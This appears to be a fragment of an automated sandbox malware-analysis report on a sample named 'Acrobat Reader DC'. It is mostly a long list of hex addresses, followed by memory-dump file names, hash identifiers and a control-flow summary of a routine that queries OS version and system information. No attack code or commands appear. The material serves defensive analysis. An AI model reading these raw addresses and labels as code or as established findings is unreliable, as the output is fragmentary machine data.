                                  0x0042b77b
                                  0x0042b77b
                                  0x0040a8d4
                                  0x0040a8d7
                                  0x0040a8da
                                  0x0042b787
                                  0x0042b789
                                  0x0042b78b
                                  0x00000000
                                  0x00000000
                                  0x0042b792
                                  0x0042b79a
                                  0x0042b79b
                                  0x0042b7a0
                                  0x00000000
                                  0x0040a8e0
                                  0x0040a8e0
                                  0x0040a8e0
                                  0x0040a8e3
                                  0x0042b7a8
                                  0x0042b7aa
                                  0x0042b7ac
                                  0x0042b7b3
                                  0x0042b7b3
                                  0x0040a8e9
                                  0x0040a8e9
                                  0x0040a8ec
                                  0x0042b7bf
                                  0x0040a8f2
                                  0x0040a8f2
                                  0x0040a8f5
                                  0x0042b7ce
                                  0x0042b7cf
                                  0x0042b7d9
                                  0x0042b7da
                                  0x0042b7df
                                  0x0040a8fb
                                  0x0040a8fb
                                  0x0040a8fe
                                  0x0042b7e7
                                  0x0042b7e9
                                  0x0042b7eb
                                  0x0042b7f2
                                  0x0042b7f2
                                  0x0042b7eb
                                  0x0040a8fe
                                  0x0040a8f5
                                  0x0040a8ec
                                  0x0040a904
                                  0x0040a904
                                  0x0040a90b
                                  0x0040a911
                                  0x0040a917
                                  0x0040a91a
                                  0x0040a91f
                                  0x0040a922
                                  0x0042b7fc
                                  0x0042b7fd
                                  0x0042b800
                                  0x00000000
                                  0x00000000
                                  0x0042b806
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042b812
                                  0x0042b81a
                                  0x00000000
                                  0x00000000
                                  0x0042b822
                                  0x0042b828
                                  0x00000000
                                  0x00000000
                                  0x0042b82f
                                  0x0042b831
                                  0x0042b836
                                  0x0042b839
                                  0x0042b83b
                                  0x0042b867
                                  0x0042b869
                                  0x0042b841
                                  0x0042b841
                                  0x0042b847
                                  0x0042b849
                                  0x0042b84b
                                  0x0042b84e
                                  0x0042b851
                                  0x0042b854
                                  0x0042b857
                                  0x0042b85a
                                  0x0042b85d
                                  0x0042b85f
                                  0x0042b85f
                                  0x00000000
                                  0x00000000
                                  0x0042b88a
                                  0x0042b88f
                                  0x0042b894
                                  0x0042b897
                                  0x0042b899
                                  0x0042b8be
                                  0x0042b8be
                                  0x0042b89f
                                  0x0042b89f
                                  0x0042b8a5
                                  0x0042b8a9
                                  0x0042b8ae
                                  0x0042b8b0
                                  0x0042b8b0
                                  0x0042b8b0
                                  0x0042b8b2
                                  0x0042b8b6
                                  0x0042b8b6
                                  0x0042b8c0
                                  0x0042b8c2
                                  0x0042b8c6
                                  0x0042b8cc
                                  0x0042b8cf
                                  0x0042b8cf
                                  0x00000000
                                  0x00000000
                                  0x0042b871
                                  0x0042b876
                                  0x00000000
                                  0x00000000
                                  0x0042b87d
                                  0x0042b883
                                  0x00000000
                                  0x00000000
                                  0x0042b8d6
                                  0x0042b8dd
                                  0x0042b8e3
                                  0x0042b8e5
                                  0x0042b8ea
                                  0x0042b8ed
                                  0x0042b8ee
                                  0x0042b8f0
                                  0x0042b8f6
                                  0x0042b8fc
                                  0x0042b8fe
                                  0x0042b8ff
                                  0x0042b900
                                  0x0042b906
                                  0x0042b908
                                  0x0042b90e
                                  0x0042b910
                                  0x0042b911
                                  0x0042b917
                                  0x0042b919
                                  0x0042b91a
                                  0x0042b91f
                                  0x0042b922
                                  0x0042b922
                                  0x0042b908
                                  0x00000000
                                  0x00000000
                                  0x0042b92d
                                  0x0042b932
                                  0x00000000
                                  0x00000000
                                  0x0042b939
                                  0x0042b93b
                                  0x0042b940
                                  0x0042b943
                                  0x0042b945
                                  0x00000000
                                  0x00000000
                                  0x0042b94b
                                  0x0042b953
                                  0x0042b958
                                  0x00000000
                                  0x00000000
                                  0x0042b968
                                  0x0042b96a
                                  0x0042b96f
                                  0x0042b971
                                  0x0042b977
                                  0x0042b979
                                  0x0042b97b
                                  0x0042b97d
                                  0x0042b97f
                                  0x0042b982
                                  0x0042b984
                                  0x0042b9b8
                                  0x0042b9ba
                                  0x0042b9bf
                                  0x0042b9c1
                                  0x0042b9c4
                                  0x0042b9c6
                                  0x0042b9c9
                                  0x0042b9cc
                                  0x0042b98a
                                  0x0042b98a
                                  0x0042b98b
                                  0x0042b990
                                  0x0042b992
                                  0x0042b995
                                  0x0042b997
                                  0x0042b999
                                  0x0042b99f
                                  0x0042b9a2
                                  0x0042b9a6
                                  0x0042b9ab
                                  0x0042b9b0
                                  0x00000000
                                  0x00000000
                                  0x0042b9d4
                                  0x0042b9d6
                                  0x0042b9db
                                  0x0042b9de
                                  0x0042b9e0
                                  0x0042b95f
                                  0x0042b95f
                                  0x0042b961
                                  0x00000000
                                  0x0042b961
                                  0x0042b9e6
                                  0x0042b9ee
                                  0x0042b9f3
                                  0x00000000
                                  0x00000000
                                  0x0042b806
                                  0x0040a928
                                  0x0040a928
                                  0x0040a92e
                                  0x00000000
                                  0x0040a92e
                                  0x0040a8da
                                  0x0040a829
                                  0x0040a9f5
                                  0x0040a9f8
                                  0x0040ab3a
                                  0x0040ab3d
                                  0x00000000
                                  0x00000000
                                  0x0040ab43
                                  0x0040ab4a
                                  0x00000000
                                  0x0040adf2
                                  0x0040adf4
                                  0x0040adf7
                                  0x0040ae02
                                  0x0040ae02
                                  0x0040ae05
                                  0x0042b285
                                  0x0042b288
                                  0x0042b28b
                                  0x00000000
                                  0x00000000
                                  0x0042b291
                                  0x0042b298
                                  0x00000000
                                  0x0042b29f
                                  0x0042b2a0
                                  0x0042b2a5
                                  0x00000000
                                  0x00000000
                                  0x0042b2ac
                                  0x0042b2ad
                                  0x0042b2b2
                                  0x00000000
                                  0x00000000
                                  0x0042b2de
                                  0x0042b2e3
                                  0x0042b2e7
                                  0x0042b2ef
                                  0x0042b2f4
                                  0x0042b2f9
                                  0x0042b2fd
                                  0x00000000
                                  0x00000000
                                  0x0042b2b9
                                  0x0042b2be
                                  0x0042b2c2
                                  0x0042b2ca
                                  0x0042b2cf
                                  0x0042b2d4
                                  0x0042b2d8
                                  0x0042b2fe
                                  0x0042b2fe
                                  0x0042b307
                                  0x0042b308
                                  0x0042b30d
                                  0x0042b310
                                  0x0042b312
                                  0x00000000
                                  0x00000000
                                  0x0042b31b
                                  0x0042b31e
                                  0x0042b323
                                  0x0042b325
                                  0x0042b332
                                  0x0042b339
                                  0x0042b33a
                                  0x0042b33f
                                  0x0042b344
                                  0x0042b348
                                  0x0042b34d
                                  0x0042b354
                                  0x0042b35f
                                  0x0042b362
                                  0x0042b364
                                  0x0042b36b
                                  0x0042b370
                                  0x0042b374
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042b298
                                  0x0040ae0b
                                  0x0040ae0c
                                  0x0040ae0f
                                  0x00000000
                                  0x0040ae0f
                                  0x0040adf9
                                  0x0040adfc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ad9c
                                  0x0040ada1
                                  0x0040ada5
                                  0x0040adad
                                  0x0040adb2
                                  0x0040adb7
                                  0x0042b12b
                                  0x0042b130
                                  0x0042b142
                                  0x0042b136
                                  0x0042b136
                                  0x0042b13a
                                  0x0042b13a
                                  0x0040adbd
                                  0x0040adbd
                                  0x0040adbd
                                  0x0040adc1
                                  0x0040adc4
                                  0x0040adc9
                                  0x0040adcc
                                  0x0040add1
                                  0x0040add3
                                  0x00000000
                                  0x0040add9
                                  0x0040add9
                                  0x0040ade0
                                  0x00000000
                                  0x00000000
                                  0x0040ade6
                                  0x0040adea
                                  0x00000000
                                  0x0040adea
                                  0x00000000
                                  0x0042b079
                                  0x0042b07e
                                  0x0042b082
                                  0x0042b08a
                                  0x0042b08f
                                  0x0042b092
                                  0x0042b095
                                  0x0042b097
                                  0x0042b09a
                                  0x0042b09d
                                  0x0042b0a0
                                  0x0042b0a2
                                  0x0042b0a4
                                  0x0042b0ad
                                  0x0042b0af
                                  0x0042b0b4
                                  0x0042b0b8
                                  0x0042b0bf
                                  0x0042b0c1
                                  0x0042b0c4
                                  0x0042b0c6
                                  0x00000000
                                  0x00000000
                                  0x0042b0cf
                                  0x0042b0d4
                                  0x0042b0d8
                                  0x0042b0e0
                                  0x0042b0e5
                                  0x0042b0e8
                                  0x0042b0eb
                                  0x0042b0ed
                                  0x0042b0f0
                                  0x0042b0f3
                                  0x0042b0f5
                                  0x0042b0f7
                                  0x0042b100
                                  0x0042b102
                                  0x0042b107
                                  0x0042b10b
                                  0x0042b10d
                                  0x0042b114
                                  0x0042b116
                                  0x00000000
                                  0x00000000
                                  0x0042b1d2
                                  0x0042b1d7
                                  0x0042b1db
                                  0x0042b1e0
                                  0x0042b1e3
                                  0x0042b1e5
                                  0x0042b1e8
                                  0x0042b1eb
                                  0x0042b1ed
                                  0x0042b1f0
                                  0x0042b1f3
                                  0x0042b1f5
                                  0x0042b1f7
                                  0x0042b1fa
                                  0x0042b1fd
                                  0x0042b200
                                  0x0042b204
                                  0x0042b207
                                  0x0042b20b
                                  0x0042b20e
                                  0x0042b212
                                  0x0042b214
                                  0x0042b218
                                  0x0042b21d
                                  0x0042b221
                                  0x0042b222
                                  0x0042b223
                                  0x0042b228
                                  0x0042b22a
                                  0x0042bb51
                                  0x0042bb53
                                  0x0042bb56
                                  0x0042bb65
                                  0x0042bb6a
                                  0x0042bb6a
                                  0x0042bb6e
                                  0x00000000
                                  0x0042bb6e
                                  0x0042b230
                                  0x0042b234
                                  0x0042b237
                                  0x00000000
                                  0x00000000
                                  0x0040ad09
                                  0x0040ad0e
                                  0x0040ad12
                                  0x0040ad1a
                                  0x0040ad1f
                                  0x0040ad24
                                  0x0040ae23
                                  0x0040ae28
                                  0x0042b11f
                                  0x0042b123
                                  0x0040ae2e
                                  0x0040ae2e
                                  0x0040ae2e
                                  0x0040ad2a
                                  0x0040ad2a
                                  0x0040ad2a
                                  0x0040ad2e
                                  0x0040ad32
                                  0x0040ad38
                                  0x0040ad3b
                                  0x0040ad40
                                  0x0040ad42
                                  0x0042bb47
                                  0x0042bb4b
                                  0x00000000
                                  0x0040ad48
                                  0x0040ad48
                                  0x0040ad4c
                                  0x00000000
                                  0x0040ad4c
                                  0x00000000
                                  0x0042b14b
                                  0x0042b150
                                  0x0042b154
                                  0x0042b159
                                  0x0042b160
                                  0x0042b165
                                  0x0042b16a
                                  0x0042b16e
                                  0x0042b172
                                  0x0042b177
                                  0x0042b179
                                  0x00000000
                                  0x00000000
                                  0x0042b17f
                                  0x0042b186
                                  0x00000000
                                  0x00000000
                                  0x0042b18c
                                  0x0042b190
                                  0x0042b193
                                  0x00000000
                                  0x00000000
                                  0x0042b37c
                                  0x0042b37e
                                  0x0042b3c6
                                  0x0042b3c6
                                  0x0042b3ca
                                  0x0042b3d1
                                  0x0042b3d6
                                  0x0042b3d8
                                  0x0042bb99
                                  0x0042bb9c
                                  0x0042bba1
                                  0x0042bbaf
                                  0x0042bbb4
                                  0x0042bbb8
                                  0x00000000
                                  0x0042bbb8
                                  0x0042b3de
                                  0x0042b3e0
                                  0x0042b3e3
                                  0x0042b3e7
                                  0x0042b3eb
                                  0x0042b3ed
                                  0x0042b3ef
                                  0x0042b3f7
                                  0x0042b3fc
                                  0x0042b3ff
                                  0x0042b403
                                  0x0042b404
                                  0x0042b405
                                  0x0042b406
                                  0x0042b408
                                  0x0042b40d
                                  0x0042b40f
                                  0x0042bbbe
                                  0x0042bbc1
                                  0x0042bbc6
                                  0x0042bbd1
                                  0x0042bbd6
                                  0x00000000
                                  0x0042bbd6
                                  0x0042b415
                                  0x0042b419
                                  0x0042b41d
                                  0x0042b425
                                  0x0042b42a
                                  0x0042b42c
                                  0x0042b431
                                  0x0042b435
                                  0x00000000
                                  0x0042b435
                                  0x0042b387
                                  0x0042b38b
                                  0x0042b38f
                                  0x0042b39f
                                  0x0042b39f
                                  0x0042b3b2
                                  0x0042b3b7
                                  0x0042b3b9
                                  0x0042bb74
                                  0x0042bb77
                                  0x0042bb7c
                                  0x0042bb8a
                                  0x0042bb8f
                                  0x0042bb93
                                  0x00000000
                                  0x0042bb93
                                  0x0042b3bf
                                  0x00000000
                                  0x0042b3bf
                                  0x0042b395
                                  0x0042b399
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ae16
                                  0x0040ae17
                                  0x0040ae1c
                                  0x00000000
                                  0x00000000
                                  0x0040aec0
                                  0x0040aec1
                                  0x0040aec6
                                  0x00000000
                                  0x00000000
                                  0x0040aeb6
                                  0x0040aeb8
                                  0x0040aeb9
                                  0x00000000
                                  0x00000000
                                  0x0042b244
                                  0x0042b245
                                  0x0042b24a
                                  0x00000000
                                  0x00000000
                                  0x0042b26b
                                  0x0042b26c
                                  0x0042b271
                                  0x00000000
                                  0x00000000
                                  0x0042b25e
                                  0x0042b25f
                                  0x0042b264
                                  0x00000000
                                  0x00000000
                                  0x0040accc
                                  0x0040accd
                                  0x0040acd2
                                  0x00000000
                                  0x00000000
                                  0x0040acd9
                                  0x0040acda
                                  0x0040acdf
                                  0x00000000
                                  0x00000000
                                  0x0040abfe
                                  0x0040ac02
                                  0x0040ac05
                                  0x0040ad8e
                                  0x0040ad91
                                  0x00000000
                                  0x00000000
                                  0x0042b1a0
                                  0x0040ac10
                                  0x0040ac10
                                  0x0040ac11
                                  0x00000000
                                  0x0040ac11
                                  0x0040ac0b
                                  0x0040ac0b
                                  0x00000000
                                  0x00000000
                                  0x0042b1aa
                                  0x0042b1ae
                                  0x0042b1b1
                                  0x0042b1c5
                                  0x0042b1c5
                                  0x0042b1ca
                                  0x0042b1ca
                                  0x0042b1cb
                                  0x00000000
                                  0x0042b1cb
                                  0x0042b1b7
                                  0x0042b1bc
                                  0x0042b1bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ac3d
                                  0x0040ac3e
                                  0x0040ac43
                                  0x00000000
                                  0x00000000
                                  0x0040ab52
                                  0x0040ab57
                                  0x00000000
                                  0x00000000
                                  0x0040ace6
                                  0x0040ace7
                                  0x0040acec
                                  0x00000000
                                  0x00000000
                                  0x0042b251
                                  0x0042b252
                                  0x0042b257
                                  0x00000000
                                  0x00000000
                                  0x0042b278
                                  0x0042b279
                                  0x0042b27e
                                  0x0040a83d
                                  0x0040a83d
                                  0x0040a841
                                  0x0040a845
                                  0x0040a845
                                  0x0040a849
                                  0x0040a84f
                                  0x0040ab5e
                                  0x0040a855
                                  0x0040a855
                                  0x0040a855
                                  0x0040a85c
                                  0x0040a867
                                  0x0040aaec
                                  0x0040aaef
                                  0x0040ab1f
                                  0x0040ab1f
                                  0x0040ab22
                                  0x0040ae37
                                  0x0040ae37
                                  0x0040ae3c
                                  0x0040ab31
                                  0x0040ab31
                                  0x0040a800
                                  0x0040a800
                                  0x0040a800
                                  0x0040a805
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a805
                                  0x00000000
                                  0x0040a800
                                  0x0040ae4f
                                  0x0040ae56
                                  0x0040ae5b
                                  0x0040ae5d
                                  0x0042bae5
                                  0x0042bae5
                                  0x0042baea
                                  0x0040ae7a
                                  0x0040ae7e
                                  0x0040ae83
                                  0x00000000
                                  0x0040ae83
                                  0x0042baf0
                                  0x0042baf5
                                  0x0042bafa
                                  0x0042baff
                                  0x0042bb01
                                  0x0042bc43
                                  0x0042bc48
                                  0x0042bc4c
                                  0x0042bc4c
                                  0x0042bc51
                                  0x0042bc55
                                  0x0042bc56
                                  0x0042bc56
                                  0x0042bc5f
                                  0x0042bc64
                                  0x0040a8a4
                                  0x0040a8aa
                                  0x0040a8aa
                                  0x0042bb07
                                  0x0042bb0b
                                  0x0042bb0f
                                  0x0042bb24
                                  0x0042bb2d
                                  0x0042bb15
                                  0x0042bb15
                                  0x0042bb1e
                                  0x0042bb1e
                                  0x0042bb33
                                  0x0042bb34
                                  0x0042bb3d
                                  0x00000000
                                  0x0042bb3d
                                  0x0040ae63
                                  0x0040ae68
                                  0x0040ae6c
                                  0x00000000
                                  0x00000000
                                  0x0040ae72
                                  0x0040ae74
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ae74
                                  0x0040ab28
                                  0x0040ab2b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ab2b
                                  0x0040aaf1
                                  0x00000000
                                  0x0040aaf8
                                  0x0040aafa
                                  0x0040abd6
                                  0x0040abd8
                                  0x0040ab00
                                  0x0040ab00
                                  0x0040ab02
                                  0x0040ab07
                                  0x0040ab0a
                                  0x0040ab0c
                                  0x0042bade
                                  0x0040ab12
                                  0x0040ab12
                                  0x0040ab12
                                  0x0040ab14
                                  0x0040ab17
                                  0x0040ab17
                                  0x0040ab1b
                                  0x0040ab1b
                                  0x0040ab1b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ac90
                                  0x0040ac90
                                  0x0040ac94
                                  0x0040ac96
                                  0x0040ad01
                                  0x0040ac98
                                  0x0040ac98
                                  0x0040ac98
                                  0x0040ac9b
                                  0x0040ac9e
                                  0x00000000
                                  0x00000000
                                  0x0040aca0
                                  0x0040aca2
                                  0x0040ad05
                                  0x0040aca4
                                  0x0040aca4
                                  0x0040aca4
                                  0x0040aca7
                                  0x0040acaa
                                  0x00000000
                                  0x0040acb0
                                  0x0040acb0
                                  0x0040acb5
                                  0x0040acb9
                                  0x0040acbe
                                  0x0040acc0
                                  0x00000000
                                  0x0040acc6
                                  0x0040acc6
                                  0x00000000
                                  0x0040acc6
                                  0x0040acc0
                                  0x0040acaa
                                  0x0040acf3
                                  0x0040acf7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042bc0b
                                  0x0042bc0f
                                  0x0042bc17
                                  0x00000000
                                  0x00000000
                                  0x0042bc21
                                  0x0042bc25
                                  0x0042bc2d
                                  0x00000000
                                  0x00000000
                                  0x0042bbf5
                                  0x0042bbf5
                                  0x0042bbf9
                                  0x0042bc01
                                  0x00000000
                                  0x00000000
                                  0x0040aaf1
                                  0x0040a872
                                  0x00000000
                                  0x00000000
                                  0x0040a878
                                  0x0040a87e
                                  0x0040ac18
                                  0x0040ac20
                                  0x0040ac20
                                  0x0040ac23
                                  0x0040ac28
                                  0x0040ac29
                                  0x0040ac2e
                                  0x0040ac31
                                  0x0040ac33
                                  0x0040ac33
                                  0x0040ac20
                                  0x0040a884
                                  0x0040a88a
                                  0x0040a8a2
                                  0x0040a8a2
                                  0x00000000
                                  0x0040a890
                                  0x0040a890
                                  0x0040a890
                                  0x0040a893
                                  0x0040a894
                                  0x0040a899
                                  0x0040a89c
                                  0x0040a89e
                                  0x00000000
                                  0x0040a890
                                  0x0040abbb
                                  0x0040abbb
                                  0x0040abc0
                                  0x0040abc4
                                  0x0040abc9
                                  0x0040abc9
                                  0x0042bbdf
                                  0x0042bbeb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040ab4a
                                  0x0040a9fe
                                  0x0040aa02
                                  0x0040aa0a
                                  0x0040aa0c
                                  0x0040ab66
                                  0x0040ab6b
                                  0x0040abeb
                                  0x0040abf0
                                  0x0040abf4
                                  0x0040ab6d
                                  0x0040ab6d
                                  0x0040ab6f
                                  0x0040ab74
                                  0x0040ab77
                                  0x0040ab79
                                  0x0042b6c3
                                  0x0040ab7f
                                  0x0040ab7f
                                  0x0040ab83
                                  0x0040ab8c
                                  0x0040ab91
                                  0x0040ab93
                                  0x0040ab93
                                  0x0040ab9b
                                  0x0040ab9e
                                  0x0040ab9e
                                  0x0040aa80
                                  0x0040aa88
                                  0x0040aa8b
                                  0x0040aa8c
                                  0x0040aa90
                                  0x0040aa93
                                  0x0040aba7
                                  0x0040abac
                                  0x0042b6ce
                                  0x0040abb2
                                  0x0040abb2
                                  0x0040abb2
                                  0x0040aa99
                                  0x0040aa99
                                  0x0040aa99
                                  0x0040aa9b
                                  0x0040aa9d
                                  0x0040aaa0
                                  0x0040aaa4
                                  0x0040aaa6
                                  0x0042b6d7
                                  0x0042b6dc
                                  0x0042b6e0
                                  0x0042b6e0
                                  0x0040aaac
                                  0x0040aaaf
                                  0x0040aab2
                                  0x0042b6ec
                                  0x0042b6ee
                                  0x0042b6f0
                                  0x00000000
                                  0x00000000
                                  0x0042b6f7
                                  0x0042b6ff
                                  0x0042b700
                                  0x0042b705
                                  0x0042b709
                                  0x00000000
                                  0x0040aab8
                                  0x0040aab8
                                  0x0040aab8
                                  0x0040aabb
                                  0x0042b711
                                  0x0042b713
                                  0x0042b715
                                  0x0042b71c
                                  0x0042b721
                                  0x0042b721
                                  0x0040aac1
                                  0x0040aac1
                                  0x0040aac4
                                  0x0042b72c
                                  0x0042b731
                                  0x0040aaca
                                  0x0040aaca
                                  0x0040aacd
                                  0x0042b73f
                                  0x0042b740
                                  0x0042b74a
                                  0x0042b74b
                                  0x0042b750
                                  0x0042b754
                                  0x0040aad3
                                  0x0040aad3
                                  0x0040aad6
                                  0x0042b75c
                                  0x0042b75e
                                  0x0042b760
                                  0x0042b767
                                  0x0042b76c
                                  0x0042b76c
                                  0x0042b760
                                  0x0040aad6
                                  0x0040aacd
                                  0x0040aac4
                                  0x0040aadc
                                  0x0040aadc
                                  0x0040aae3
                                  0x0040aae5
                                  0x00000000
                                  0x0040aae5
                                  0x0040aab2
                                  0x0040aa12
                                  0x0040aa18
                                  0x00000000
                                  0x00000000
                                  0x0040aa1a
                                  0x0040aa1d
                                  0x0040aa1f
                                  0x0042b43e
                                  0x0042b443
                                  0x0042b443
                                  0x0040aa25
                                  0x0040aa28
                                  0x0040aa2b
                                  0x0042b44f
                                  0x0042b451
                                  0x0042b453
                                  0x00000000
                                  0x00000000
                                  0x0042b45a
                                  0x0042b462
                                  0x0042b463
                                  0x0042b468
                                  0x00000000
                                  0x0040aa31
                                  0x0040aa31
                                  0x0040aa31
                                  0x0040aa34
                                  0x0042b470
                                  0x0042b472
                                  0x0042b474
                                  0x0042b47b
                                  0x0042b47b
                                  0x0040aa3a
                                  0x0040aa3a
                                  0x0040aa3d
                                  0x0042b487
                                  0x0040aa43
                                  0x0040aa43
                                  0x0040aa46
                                  0x0042b496
                                  0x0042b497
                                  0x0042b4a1
                                  0x0042b4a2
                                  0x0042b4a7
                                  0x0040aa4c
                                  0x0040aa4c
                                  0x0040aa4f
                                  0x0042b4af
                                  0x0042b4b1
                                  0x0042b4b3
                                  0x0042b4ba
                                  0x0042b4ba
                                  0x0042b4b3
                                  0x0040aa4f
                                  0x0040aa46
                                  0x0040aa3d
                                  0x0040aa55
                                  0x0040aa55
                                  0x0040aa5c
                                  0x0040aa62
                                  0x0040aa67
                                  0x0040aa6a
                                  0x0040aa6f
                                  0x0040aa72
                                  0x0042b4c4
                                  0x0042b4c5
                                  0x0042b4c8
                                  0x00000000
                                  0x00000000
                                  0x0042b4ce
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042b4db
                                  0x0042b4dd
                                  0x0042b4e3
                                  0x00000000
                                  0x00000000
                                  0x0042b4eb
                                  0x0042b4f1
                                  0x00000000
                                  0x00000000
                                  0x0042b4f8
                                  0x0042b4fa
                                  0x0042b4ff
                                  0x0042b502
                                  0x0042b504
                                  0x0042b530
                                  0x0042b532
                                  0x0042b50a
                                  0x0042b50a
                                  0x0042b510
                                  0x0042b512
                                  0x0042b514
                                  0x0042b517
                                  0x0042b51a
                                  0x0042b51d
                                  0x0042b520
                                  0x0042b523
                                  0x0042b526
                                  0x0042b528
                                  0x0042b528
                                  0x00000000
                                  0x00000000
                                  0x0042b553
                                  0x0042b558
                                  0x0042b55d
                                  0x0042b560
                                  0x0042b562
                                  0x0042b587
                                  0x0042b587
                                  0x0042b568
                                  0x0042b568
                                  0x0042b56e
                                  0x0042b572
                                  0x0042b577
                                  0x0042b579
                                  0x0042b579
                                  0x0042b579
                                  0x0042b57b
                                  0x0042b57f
                                  0x0042b57f
                                  0x0042b589
                                  0x0042b58b
                                  0x0042b58f
                                  0x0042b595
                                  0x0042b598
                                  0x0042b598
                                  0x00000000
                                  0x00000000
                                  0x0042b53a
                                  0x0042b53f
                                  0x00000000
                                  0x00000000
                                  0x0042b546
                                  0x0042b54c
                                  0x00000000
                                  0x00000000
                                  0x0042b59f
                                  0x0042b5a6
                                  0x0042b5ac
                                  0x0042b5ae
                                  0x0042b5b3
                                  0x0042b5b6
                                  0x0042b5b7
                                  0x0042b5b9
                                  0x0042b5bf
                                  0x0042b5c5
                                  0x0042b5c7
                                  0x0042b5c8
                                  0x0042b5c9
                                  0x0042b5cf
                                  0x0042b5d1
                                  0x0042b5d7
                                  0x0042b5d9
                                  0x0042b5da
                                  0x0042b5e0
                                  0x0042b5e2
                                  0x0042b5e3
                                  0x0042b5e8
                                  0x0042b5eb
                                  0x0042b5eb
                                  0x0042b5d1
                                  0x00000000
                                  0x00000000
                                  0x0042b5f6
                                  0x0042b5fb
                                  0x00000000
                                  0x00000000
                                  0x0042b602
                                  0x0042b604
                                  0x0042b609
                                  0x0042b60c
                                  0x0042b60e
                                  0x00000000
                                  0x00000000
                                  0x0042b614
                                  0x0042b61c
                                  0x0042b621
                                  0x00000000
                                  0x00000000
                                  0x0042b631
                                  0x0042b633
                                  0x0042b638
                                  0x0042b63a
                                  0x0042b640
                                  0x0042b642
                                  0x0042b644
                                  0x0042b646
                                  0x0042b648
                                  0x0042b64b
                                  0x0042b64d
                                  0x0042b681
                                  0x0042b683
                                  0x0042b688
                                  0x0042b68a
                                  0x0042b68d
                                  0x0042b68f
                                  0x0042b692
                                  0x0042b695
                                  0x0042b653
                                  0x0042b653
                                  0x0042b654
                                  0x0042b659
                                  0x0042b65b
                                  0x0042b65e
                                  0x0042b660
                                  0x0042b662
                                  0x0042b668
                                  0x0042b66b
                                  0x0042b66f
                                  0x0042b674
                                  0x0042b679
                                  0x00000000
                                  0x00000000
                                  0x0042b69d
                                  0x0042b69f
                                  0x0042b6a4
                                  0x0042b6a7
                                  0x0042b6a9
                                  0x0042b628
                                  0x0042b628
                                  0x0042b62a
                                  0x00000000
                                  0x0042b62a
                                  0x0042b6af
                                  0x0042b6b7
                                  0x0042b6bc
                                  0x00000000
                                  0x00000000
                                  0x0042b4ce
                                  0x0040aa78
                                  0x0040aa78
                                  0x0040aa7e
                                  0x00000000
                                  0x0040aa7e
                                  0x0040aa2b
                                  0x0040a838
                                  0x0040a838
                                  0x00000000
                                  0x0040a838

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc
                                  • String ID: Default
                                  • API String ID: 1579825452-753088835
                                  • Opcode ID: 6871cbe5e1678fab122cc2967b2eb3447a2bb1c0afee60a0f61c836f5c50f1ae
                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                  • Opcode Fuzzy Hash: 6871cbe5e1678fab122cc2967b2eb3447a2bb1c0afee60a0f61c836f5c50f1ae
                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1214 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1223 40e582-40e583 1214->1223 1224 427674-427679 1214->1224 1227 40e585-40e596 1223->1227 1228 40e5ba-40e5cb call 40ef60 1223->1228 1225 427683-427686 1224->1225 1226 42767b-427681 1224->1226 1231 427693-427696 1225->1231 1232 427688-427691 1225->1232 1230 4276b4-4276be 1226->1230 1233 427625-427629 1227->1233 1234 40e59c-40e59f 1227->1234 1243 40e5ec-40e60c 1228->1243 1244 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1228->1244 1245 4276c6-4276ca GetSystemInfo 1230->1245 1231->1230 1240 427698-4276a8 1231->1240 1232->1230 1236 427636-427640 1233->1236 1237 42762b-427631 1233->1237 1238 40e5a5-40e5ae 1234->1238 1239 427654-427657 1234->1239 1236->1228 1237->1228 1247 40e5b4 1238->1247 1248 427645-42764f 1238->1248 1239->1228 1246 42765d-42766f 1239->1246 1241 4276b0 1240->1241 1242 4276aa-4276ae 1240->1242 1241->1230 1242->1230 1250 40e612-40e623 call 40efd0 1243->1250 1251 4276d5-4276df GetSystemInfo 1243->1251 1244->1243 1257 40e5e8 1244->1257 1245->1251 1246->1228 1247->1228 1248->1228 1250->1245 1256 40e629-40e63f call 40ef90 GetNativeSystemInfo 1250->1256 1260 40e641-40e642 FreeLibrary 1256->1260 1261 40e644-40e651 1256->1261 1257->1243 1260->1261 1262 40e653-40e654 FreeLibrary 1261->1262 1263 40e656-40e65d 1261->1263 1262->1263
                                  C-Code - Quality: 89%
